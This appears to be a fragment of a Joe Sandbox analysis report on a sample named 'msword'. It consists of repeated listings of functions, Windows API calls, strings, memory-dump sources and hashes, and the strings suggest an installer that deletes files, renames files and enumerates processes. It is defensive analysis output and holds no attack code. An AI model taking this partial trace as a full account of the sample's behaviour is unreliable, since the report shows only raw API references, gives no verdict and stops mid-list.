                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $ @$M$N
                                                                    • API String ID: 1638840714-3479655940
                                                                    • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                    • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                    Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                    • String ID: 82D$@%F$@rD$A
                                                                    • API String ID: 3347642858-1086125096
                                                                    • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                    • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                    Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                    • API String ID: 1916479912-1189179171
                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                    Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                    Strings
                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                    • \*.*, xrefs: 00406D03
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                    • API String ID: 2035342205-3294556389
                                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                    Strings
                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                    • API String ID: 542301482-1377821865
                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                    Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                    Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                    • API String ID: 20674999-2124804629
                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                    Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                    • String ID: @%F$N$open
                                                                    • API String ID: 3928313111-3849437375
                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                    Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
